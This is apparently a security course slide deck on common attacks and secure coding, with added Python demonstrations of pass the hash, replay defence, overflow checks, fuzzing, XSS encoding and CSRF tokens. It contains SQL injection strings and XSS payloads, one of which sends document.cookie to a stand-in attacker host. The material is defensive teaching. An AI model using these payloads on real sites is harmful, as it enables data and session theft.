This document discusses advanced attacks and secure coding concepts. It compares common attacks like denial-of-service, privilege escalation, and spoofing. It also summarizes secure coding practices such as input validation, error handling, and normalization. Application attacks like SQL injection, cross-site scripting, and cross-site request forgery are identified. Finally, it touches on security frameworks and guides.
2. Introduction
• Comparing common attacks
• Summarizing secure coding concepts
• Identifying application attacks
• Understanding frameworks and guides
3. Common Attacks
• Denial-of-service (DoS)
– Comes from one system
• Distributed denial-of-service (DDoS)
– Multiple attacking computers (often a botnet under one attacker's control)
– Typically includes sustained, abnormally high network traffic
4. Common Attacks
• Privilege escalation
– Gain additional privileges after the initial exploit
• Spoofing
– Impersonating or masquerading as someone or something else
– MAC spoofing
– IP spoofing
5. Common Attacks
• SYN flood attack
– Common attack against Internet servers
– Disrupts the TCP three-way handshake
– Attacker sends SYNs, receives SYN-ACKs, and withholds the 3rd packet (the final ACK), leaving half-open connections that fill the server's listen backlog
– SYN cookies and backlog tuning on the server mitigate it
9. DNS Attacks
• DNS poisoning
– Attempt to corrupt DNS data (in a resolver's cache or on the authoritative server) so that names resolve to attacker-controlled addresses
– Protect against with DNSSEC
• Pharming
– Redirects a web site's traffic to another, attacker-controlled web site, typically by poisoning DNS or a host's local hosts file
• DDoS DNS attacks
– DNS amplification attack: small queries with a spoofed source address (the victim's IP) are sent to open resolvers, which return much larger responses to the victim
10. Amplification Attack
• Smurf
– A ping is normally unicast
– Smurf attack sends the ping out as a broadcast
– Smurf attack spoofs the source IP with the victim's address, so every host on the segment replies to the victim
– Directed broadcast through an amplifying network
– Disable directed broadcasts on border routers (on Cisco IOS, no ip directed-broadcast on each interface, which is the default in current releases)
13. Password Attacks
• Online password attack
– Attempts to discover a password by authenticating against a live system; limited by lockout and rate limiting
• Offline password attack
– Attempts to discover passwords from a captured database or a packet capture; limited only by the attacker's hardware and the cost of the hash
15. Password Attacks
• Pass the hash
– Attacker obtains the password hash (for example from a credential dump on a compromised host)
– Attacker uses the hash itself to log on, without ever knowing the password
– Older protocols susceptible
• Microsoft LAN Manager (LM)
• NT LAN Manager (NTLM)
• The deck recommends NTLMv2 instead; note that NTLMv2 still keys its challenge-response with the NT hash, so a stolen hash remains password-equivalent. Prefer Kerberos, disable NTLM where possible, and keep privileged accounts from logging on to hosts where their hashes can be dumped.
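The following is an added example, not part of the deck, that shows why a dumped hash is enough to authenticate (pass the hash) and why a dumped database enables an offline attack that the server's lockout policy never sees. It stands in SHA-256 over UTF-16LE for the real NTLM MD4 hash, since MD4 is not available in every hashlib build; the challenge-response protocol, the accounts and the wordlist are constructed for the example.

```python
import hashlib
import hmac
import secrets


def credential_hash(password):
    # Stand-in for the NT hash (real NTLM: MD4 over UTF-16LE). The server
    # stores this value, never the password.
    return hashlib.sha256(password.encode("utf-16-le")).digest()


# Constructed sample accounts: what an attacker would dump from the server.
USER_DB = {
    "alice": credential_hash("Summer2024!"),
    "bob": credential_hash("correct horse battery staple"),
}


def server_challenge():
    return secrets.token_bytes(16)


def client_response(cred_hash, challenge):
    # Challenge-response keyed with the hash: anyone holding the hash can
    # compute it, which is exactly what pass the hash exploits.
    return hmac.new(cred_hash, challenge, hashlib.sha256).digest()


def server_verify(user, challenge, response):
    expected = hmac.new(USER_DB[user], challenge, hashlib.sha256).digest()
    return hmac.compare_digest(expected, response)


def login_with_password(user, password):
    challenge = server_challenge()
    response = client_response(credential_hash(password), challenge)
    return server_verify(user, challenge, response)


def pass_the_hash(user, stolen_hash):
    # Attacker never cracks anything: the dumped hash is used as the key.
    challenge = server_challenge()
    return server_verify(user, challenge, client_response(stolen_hash, challenge))


# Offline attack: guesses are hashed locally and compared with the dump.
# Because the hashes are unsalted, one precomputed table serves every user.
WORDLIST = ["password", "Summer2024!", "letmein", "Winter2023?"]


def offline_crack(dumped, wordlist):
    table = {credential_hash(w): w for w in wordlist}
    return {user: table[h] for user, h in dumped.items() if h in table}
```

Salting the stored hash and using a slow KDF would force the offline attacker to do the work per user and per guess, but it does nothing against pass the hash: that requires changing the protocol so the stored value is not itself the credential.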
18. Common Attacks
• Replay
– Replays captured data in an attempt to impersonate the client
– Timestamps and sequence numbers are effective countermeasures
• Can be
– An application/service attack
– A wireless attack
– A cryptographic attack
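An added example (not from the deck) of the two countermeasures named above: each message carries a sequence number and a timestamp under an HMAC, and the receiver rejects anything outside its time window or at or below the last sequence number it accepted. The shared key, message format and window size are constructed for the example.

```python
import hashlib
import hmac
import struct
import time

KEY = b"shared-secret-for-example"  # constructed; real systems derive a per-session key
HEADER = struct.Struct("!IQ")       # 32-bit sequence number, 64-bit unix timestamp
TAG_LEN = 32


def build_message(seq, payload, now=None):
    ts = int(now if now is not None else time.time())
    header = HEADER.pack(seq, ts)
    tag = hmac.new(KEY, header + payload, hashlib.sha256).digest()
    return header + payload + tag


class Receiver:
    def __init__(self, window_seconds=30):
        self.last_seq = 0
        self.window = window_seconds

    def accept(self, msg, now=None):
        """Return (True, payload) or (False, reason)."""
        now = now if now is not None else time.time()
        if len(msg) < HEADER.size + TAG_LEN:
            return False, "truncated"
        header, payload, tag = msg[:HEADER.size], msg[HEADER.size:-TAG_LEN], msg[-TAG_LEN:]
        expected = hmac.new(KEY, header + payload, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, tag):
            return False, "bad tag"        # forged or tampered (seq/ts are covered too)
        seq, ts = HEADER.unpack(header)
        if abs(now - ts) > self.window:
            return False, "stale"          # captured long ago, replayed now
        if seq <= self.last_seq:
            return False, "replayed"       # already processed this sequence number
        self.last_seq = seq
        return True, payload
```

The tag must cover the sequence number and timestamp, otherwise the attacker simply rewrites them; and the window plus the monotonic counter together mean a captured message is useless both immediately (counter) and later (timestamp).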
19. Common Attacks
• Known plaintext
– Attacker has samples of both the plaintext and the corresponding ciphertext and uses them to recover the key or keystream
• Compare with chosen plaintext, where the attacker can pick the plaintext and obtain its ciphertext
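An added example, not from the deck, of a known-plaintext attack in its simplest practical form: a stream cipher whose key and nonce were reused. XOR of the known plaintext with its ciphertext yields the keystream, which then decrypts the other message. The toy counter-mode keystream, key, nonce and messages are constructed; the point is the key reuse, not the particular cipher.

```python
import hashlib


def keystream(key, nonce, length):
    # Constructed counter-mode keystream from SHA-256; stands in for any stream cipher.
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))  # truncates to the shorter input


def encrypt(key, nonce, plaintext):
    return xor_bytes(plaintext, keystream(key, nonce, len(plaintext)))


def recover_keystream(known_plain, known_cipher):
    # Attacker's step 1: plaintext XOR ciphertext == keystream for those bytes.
    return xor_bytes(known_plain, known_cipher)


def known_plaintext_attack(known_plain, known_cipher, target_cipher):
    # Attacker's step 2: if key and nonce were reused, the recovered keystream
    # decrypts the target up to the length of the known sample.
    return xor_bytes(target_cipher, recover_keystream(known_plain, known_cipher))


KEY = b"k" * 32
NONCE = b"fixed-nonce"                                  # the mistake: reused below
M1 = b"GET /status HTTP/1.1\r\nHost: example.test"      # predictable, hence "known"
M2 = b"POST /transfer amount=5000 to=attacker"          # the secret message
C1 = encrypt(KEY, NONCE, M1)
C2 = encrypt(KEY, NONCE, M2)
```

Protocol headers, file magic bytes and padding are the usual sources of known plaintext; the defence is a fresh nonce per message, so the recovered keystream applies to nothing else.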
20. Common Attacks
• Typo squatting / URL hijacking
– Attackers purchase similar domain names for various malicious purposes
– Users visit the typo squatting domain when they enter the URL incorrectly with a common typo
• Clickjacking
– Tricks users into clicking something different from what they see
– Typically uses frames (the target page in a transparent iframe over a decoy)
– Mitigated with the X-Frame-Options header or a Content-Security-Policy frame-ancestors directive
21. Common Attacks
• Session hijacking
– Impersonate the user with the session ID
– Session IDs are stored in cookies; protect them with the Secure, HttpOnly and SameSite attributes, send them only over TLS, and issue a fresh ID at login
• Domain hijacking
– Attacker changes the registration of the domain name
– Typically done with social engineering, either against the registrar or by guessing or phishing the owner's registrar password
23. Common Attacks
• Zero-day vulnerabilities
– Undocumented and unknown to the public
– Vendor might know about it, but has not yet released a patch to address it
• Zero-day attack
– Attempts to exploit zero-day vulnerabilities
– Also known as a zero-day exploit
24. Memory Buffer Vulnerabilities
Application bugs
• Memory leak
– App consumes more and more memory without releasing it
– Can exhaust memory and crash the application or the operating system
• Integer overflow
– App attempts to use or create a numeric value too big for the available storage, so the value wraps around
– 8-bit storage
– 95 x 59 = 5,605 (needs at least 13 bits to store); in 8 bits it wraps to 229
25. Memory Buffer Vulnerabilities
• Buffer overflow and buffer overflow attack
– Occur when an application writes more data into a buffer than the buffer can hold
– Overwrites adjacent memory (other variables, saved return addresses)
– Exploit payloads often include a NOP sled (0x90 on x86) ahead of the shellcode so an imprecise jump still lands on it
– Can then insert malicious code into memory and redirect execution to it
– Input validation (length checks) helps prevent buffer overflow attacks; bounds-checked APIs and mitigations such as stack canaries, DEP/NX and ASLR limit exploitation
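An added example, not from the deck, covering both slides above: it emulates fixed-width arithmetic to reproduce the deck's 95 x 59 case, then shows how an integer overflow in a size calculation defeats the very bounds check that is supposed to prevent a buffer overflow. Python integers do not wrap, so the wrap is emulated explicitly; the buffer capacity and the 16-bit size field are constructed.

```python
def wrap(value, bits):
    """Emulate unsigned fixed-width arithmetic: keep only the low `bits` bits."""
    return value & ((1 << bits) - 1)


def mul8(a, b):
    # The deck's example: 95 * 59 = 5605 needs 13 bits; in 8 bits it wraps.
    return wrap(a * b, 8)


def checked_mul(a, b, bits):
    """Multiply, but refuse a result that would not fit in `bits` bits."""
    product = a * b
    if product != wrap(product, bits):
        raise OverflowError(f"{a} * {b} does not fit in {bits} bits")
    return product


BUFFER_CAPACITY = 1024  # constructed: bytes available for the incoming record


def unsafe_allocation_check(count, elem_size):
    # Vulnerable pattern: total computed in 16-bit arithmetic. A wrapped,
    # small total passes the check while the real data is far larger; in C
    # the subsequent copy overruns the buffer.
    total = wrap(count * elem_size, 16)
    return total <= BUFFER_CAPACITY


def safe_allocation_check(count, elem_size):
    # Overflow-aware version: an overflowing size is rejected outright.
    try:
        total = checked_mul(count, elem_size, 16)
    except OverflowError:
        return False
    return total <= BUFFER_CAPACITY
```

The attacker's input in the test is count=256, elem_size=257: the true size 65,792 wraps to 256 in 16 bits, which is under the 1,024-byte capacity. C compilers offer __builtin_mul_overflow for exactly this check.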
27. Secure Coding Concepts
• Compiled code
– Optimized
– Run as an executable
– Compiler checks the program for errors and
• Runtime code
– Code is evaluated, interpreted, and executed when the code is run
– HTML is interpreted by web browsers and displayed as web pages
28. Input Validation
• Verifies validity of data before using it
– Verifies proper characters (prefer an allow-list of what is acceptable over a block-list of known-bad input)
– Uses boundary and/or range checking
– Blocks HTML code
– Prevents the use of certain characters
• Client-side vs server-side
– Server-side is the only validation an attacker cannot bypass (many sites use both; client-side is for usability)
• Input validation helps prevent
– Buffer overflow, SQL injection, command injection, and cross-site scripting attacks
29. Secure Coding Concepts
• Avoid race conditions
– Occur when two threads or modules access the same resource and the result depends on which finishes first
– A check-then-act sequence (verify a condition, then use the resource) is the classic window: the state can change between the check and the act
– Database locks or transactions, and mutexes in code, prevent race conditions by making the check and the update one atomic step
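An added example (not from the deck) of a check-then-act race on an account balance, run with real threads: the unlocked version lets every thread pass the balance check before any of them debits, the locked version serialises check and debit. The account, amounts and thread count are constructed; a Barrier is used only to force the threads into the race window so the outcome is reproducible rather than luck-dependent.

```python
import threading


class Account:
    def __init__(self, balance):
        # The balance is kept as a ledger so that a debit is a single
        # list.append (atomic in CPython); the race shown is purely the
        # check-then-act window, not a torn read-modify-write.
        self.ledger = [balance]
        self.lock = threading.Lock()

    @property
    def balance(self):
        return sum(self.ledger)

    def withdraw_unsafe(self, amount, gate=None):
        if self.balance >= amount:          # check
            if gate is not None:
                gate.wait()                 # test aid: hold here until all threads passed the check
            self.ledger.append(-amount)     # act, on stale information
            return True
        return False

    def withdraw_safe(self, amount):
        # The lock is the in-process analogue of a database row lock or a
        # SELECT ... FOR UPDATE transaction: nobody else can act between
        # our check and our update.
        with self.lock:
            if self.balance >= amount:
                self.ledger.append(-amount)
                return True
            return False


def run_concurrent(account, unsafe, amount, threads):
    """Run `threads` simultaneous withdrawals; return (successes, final balance)."""
    gate = threading.Barrier(threads) if unsafe else None
    results = []

    def worker():
        if unsafe:
            results.append(account.withdraw_unsafe(amount, gate))
        else:
            results.append(account.withdraw_safe(amount))

    workers = [threading.Thread(target=worker) for _ in range(threads)]
    for t in workers:
        t.start()
    for t in workers:
        t.join()
    return sum(results), account.balance
```

Five withdrawals of 60 from a balance of 100 should allow exactly one; without the lock all five succeed and the account goes to -200. In a real database the same bug shows up as two requests that both read the old row before either writes it.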
30. Error and Exception Handling
• Catch errors and provide feedback
– Prevents improper input from crashing an application or leaking information to attackers
– Errors shown to users should be general
– Logged information should be detailed
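An added example, not from the deck, that puts the input validation slide and the error handling slide together: an order form is validated with an allow-list, range checks and forbidden-character checks, and the request handler returns only a generic message to the caller while the precise reason goes to a server-side audit record. Field names, limits and the audit list are constructed for the example.

```python
import re

USERNAME_RE = re.compile(r"[A-Za-z0-9_]{3,32}")   # allow-list: what is acceptable
FORBIDDEN = re.compile(r"[<>\"'`;]")               # block markup/quote characters in free text
MAX_NOTE = 200


class ValidationError(ValueError):
    pass


def validate_order(form):
    """Return a cleaned order dict or raise ValidationError with a precise reason."""
    username = form.get("username", "")
    if not USERNAME_RE.fullmatch(username):
        raise ValidationError(f"username {username!r} fails allow-list")
    raw_qty = form.get("quantity", "")
    try:
        qty = int(raw_qty)
    except ValueError:
        raise ValidationError(f"quantity {raw_qty!r} is not an integer")
    if not 1 <= qty <= 100:                        # boundary / range check
        raise ValidationError(f"quantity {qty} outside 1..100")
    note = form.get("note", "")
    if len(note) > MAX_NOTE or FORBIDDEN.search(note):
        raise ValidationError("note too long or contains forbidden characters")
    return {"username": username, "quantity": qty, "note": note}


def handle_request(form, audit):
    """Generic message to the user; detailed record appended to `audit` (the log)."""
    try:
        order = validate_order(form)
    except ValidationError as e:
        audit.append(f"rejected {form!r}: {e}")          # detail stays server-side
        return 400, "Invalid request."                    # no field names, no internals
    except Exception as e:                                # anything unexpected
        audit.append(f"internal error on {form!r}: {type(e).__name__}: {e}")
        return 500, "Something went wrong."               # never a stack trace to the client
    return 200, f"Order accepted for {order['quantity']} item(s)."
```

The generic 400 tells an attacker nothing about which check failed, while the audit line gives the defender the exact input and reason; that split is the whole point of the two slides.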
32. Secure Coding Concepts
• Code reuse
– Reuse tested, reviewed code; avoid dead code (unreachable code that nobody maintains)
• Software development kits (SDKs)
– Provide software tools that are easy to reuse
• Code obfuscation
– Camouflages code to make reverse engineering harder; it is not a substitute for removing embedded secrets or fixing vulnerabilities
33. Code Quality and Testing
• Static code analyzers
• Dynamic analysis
• Stress testing
• Sandboxing
• Model verification
34. Code Quality and Testing
• Fuzzing
– Sends random or malformed data to applications looking for crashes and other vulnerabilities
– Attackers use it to find inputs that can be used in an attack
– Administrators and developers use fuzz testing to test applications before attackers do
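An added example (not from the deck) of a minimal fuzzer run against a tiny "key=value;key=value" parser that crashes on input it did not expect, and against a fixed parser that rejects malformed input with a controlled error. The parser, its bug, the alphabet and the seed are constructed; the seed makes the run reproducible.

```python
import random


class MalformedConfig(ValueError):
    """Controlled rejection: the fixed parser raises this, never anything else."""


def parse_config_buggy(line):
    # Crashes (ValueError from tuple unpacking) on "abc", "", or "a=b=c".
    result = {}
    for token in line.split(";"):
        key, value = token.split("=")
        result[key] = value
    return result


def parse_config_fixed(line):
    result = {}
    for token in line.split(";"):
        if not token:
            continue                                   # tolerate empty/trailing separators
        key, sep, value = token.partition("=")         # "a=b=c" -> key a, value "b=c"
        if not sep or not key:
            raise MalformedConfig(f"malformed token {token!r}")
        result[key] = value
    return result


ALPHABET = "ab=;"  # constructed: small alphabet so the fuzzer hits edge cases fast


def fuzz(parser, iterations=500, seed=7):
    """Feed random strings to `parser`; return the inputs that crashed it unexpectedly."""
    rng = random.Random(seed)
    crashes = []
    for _ in range(iterations):
        s = "".join(rng.choice(ALPHABET) for _ in range(rng.randint(0, 8)))
        try:
            parser(s)
        except MalformedConfig:
            pass                                       # documented rejection, not a bug
        except Exception as e:                         # anything else is a finding
            crashes.append((s, repr(e)))
    return crashes
```

Real fuzzers (AFL, libFuzzer) are coverage-guided and mutate valid inputs rather than drawing from a fixed alphabet, but the loop is the same: generate, run, record anything that is not a documented outcome.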
35. SDLC Models
Software development life cycle (SDLC) models
• Waterfall
– Multiple stages going from top to bottom
– Strict
• Agile
– Starts with a set of principles
– Uses iterative cycles with incremental changes
– Flexible
37. Secure Coding Concepts
• Change management
– Ensures developers do not make unauthorized changes
– Provides an accounting structure
• Version control
– Tracks software versions
– Identifies who made the change and when
38. Secure Coding Concepts
• Provisioning (an application)
– Preparing to deploy it
– Configuring it for the environment it will run in
• Deprovisioning (an application)
– Removing it completely, including its accounts, credentials and data
43. Database concepts
1NF
• Each row within a table is unique and identified with a primary key
• Related data is contained in a separate table
• None of the columns include repeating groups
44. Database concepts
2NF (must be in 1NF)
• Non-primary key attributes are completely dependent on the whole composite primary key, not on just part of it
• In the deck's example table, the Publisher column depends on only part of the composite key and so violates this rule
45. Database concepts
3NF (must be in 2NF and 1NF)
• All columns that aren't primary keys are dependent only on the primary key
• None of the columns in the table are dependent on non-primary key attributes
• In the deck's example table, the PublisherCity column violates this rule: it depends on the Publisher column (a non-key attribute) and only through Publisher on the BookID primary key, a transitive dependency
46. SQL Queries
• Used to access data
• Commonly used with web pages
SELECT * FROM Books WHERE Author = 'Darril Gibson'
Attackers enter this instead: Darril Gibson'; SELECT * FROM Customers;--
Result (where the database driver allows stacked statements):
SELECT * FROM Books WHERE Author = 'Darril Gibson';
SELECT * FROM Customers;--'
The -- turns the application's closing quote into a comment, so both statements run
47. SQL Queries
SELECT * FROM Customers WHERE name = 'Homer Simpson'
• Using SQL injection, the attacker enters ' or '1'='1' -- as the name:
SELECT * FROM Customers WHERE name = ' ' or '1'='1' --'
• Result
– The WHERE clause is now name = ' ' OR '1'='1', which is true for every row, so every customer is returned; the trailing -- comments out the original closing quote
48. SQL Injection Attack
• Used on unprotected web pages to access backend databases
• Often uses the phrase ' or '1'='1 '
• Tricks the database into providing information
• Best protection
– Parameterized queries (prepared statements) or stored procedures that take parameters, plus input validation; escaping alone is error-prone
• XML injection (similar to SQL injection)
50. Application Attacks
• Cross-site scripting (XSS)
– Attackers embed malicious HTML or JavaScript code that runs in other users' browsers
– Can be in a web site (stored or reflected) or in links in email
– Prevented with server-side input validation and, above all, context-aware output encoding
– OWASP recommends using a vetted encoding library rather than hand-written escaping
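An added example (not from the deck) of the output-encoding defence: a comment is rendered into three HTML contexts (text, attribute value, and a URL in href). The standard library's html.escape handles the first two; for the URL context encoding is not enough, the scheme has to be allow-listed or a javascript: link survives intact. The page template and payloads are constructed.

```python
import html
from urllib.parse import urlparse


def render_comment_vulnerable(name, comment, link):
    # Untrusted input dropped straight into markup.
    return f'<p><b>{name}</b> says: {comment} <a href="{link}">link</a></p>'


SAFE_SCHEMES = {"http", "https"}


def safe_href(url):
    # URL context: allow-list the scheme first, then encode for the attribute.
    # Encoding alone would leave javascript:alert(1) fully functional.
    if urlparse(url).scheme.lower() not in SAFE_SCHEMES:
        return "#"
    return html.escape(url, quote=True)


def render_comment_safe(name, comment, link):
    # Text and attribute contexts: escape <, >, &, " and '.
    return (f'<p><b>{html.escape(name, quote=True)}</b> says: '
            f'{html.escape(comment, quote=True)} '
            f'<a href="{safe_href(link)}">link</a></p>')


# Constructed payloads for the three contexts.
PAYLOAD_COMMENT = "<script>location='http://evil.test/?c='+document.cookie</script>"
PAYLOAD_NAME = '" onmouseover="alert(1)'
PAYLOAD_LINK = "javascript:alert(document.cookie)"
```

A Content-Security-Policy that forbids inline script is the second layer: it makes a missed encoding site much harder to exploit, but it does not replace encoding.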
51. Application Attacks
• Cross-site request forgery (XSRF, CSRF)
– Causes users to perform actions on websites without their knowledge: the attacker's page makes the victim's browser send a request that carries the victim's session cookie
– Attackers use it to perform state-changing actions as the victim (transfer funds, change an email address or password); it does not let the attacker read the victim's cookies or passwords
– Anti-CSRF tokens tied to the session, together with SameSite cookies, block this attack
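An added example, not from the deck, of an anti-CSRF token bound to the session with an HMAC: the site embeds the token in its own forms, the attacker's auto-submitting form cannot include it (the same-origin policy keeps the attacker from reading the victim's page, and the server key keeps them from computing it). The session store, cookie attributes and the transfer handler are constructed.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)   # per-deployment secret (constructed here)
SESSIONS = {}                          # session_id -> username (in-memory stand-in)


def login(username):
    sid = secrets.token_urlsafe(32)    # unguessable session ID, fresh per login
    SESSIONS[sid] = username
    return sid


def session_cookie(sid):
    # Attributes that limit hijacking (Secure, HttpOnly) and cross-site sending (SameSite).
    return f"session={sid}; Secure; HttpOnly; SameSite=Lax; Path=/"


def csrf_token(sid):
    # Bound to the session: a token minted for another session will not verify.
    return hmac.new(SERVER_KEY, sid.encode(), hashlib.sha256).hexdigest()


def handle_transfer(cookie_sid, form):
    """State-changing endpoint: requires a valid session AND a matching CSRF token."""
    user = SESSIONS.get(cookie_sid)
    if user is None:
        return 401, "not logged in"
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token, csrf_token(cookie_sid)):
        return 403, "csrf check failed"
    return 200, f"{user} transferred {form['amount']} to {form['to']}"


def legitimate_form(sid, amount, to):
    # The site's own page embeds the token in a hidden field.
    return {"csrf_token": csrf_token(sid), "amount": amount, "to": to}


def forged_form(amount, to):
    # Attacker's page auto-submits this; the browser attaches the victim's
    # cookie, but the attacker has no way to supply the right token.
    return {"amount": amount, "to": to}
```

SameSite=Lax alone already stops the classic cross-site POST in modern browsers, but the token is what protects older clients and any endpoint that accepts GET for state changes.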
52. Frameworks and Guides
• Frameworks
– Regulatory
– Non-regulatory
– National versus international
– Industry-specific
• Guides
– Vendor-specific
– Platform-specific
– Role- or goal-specific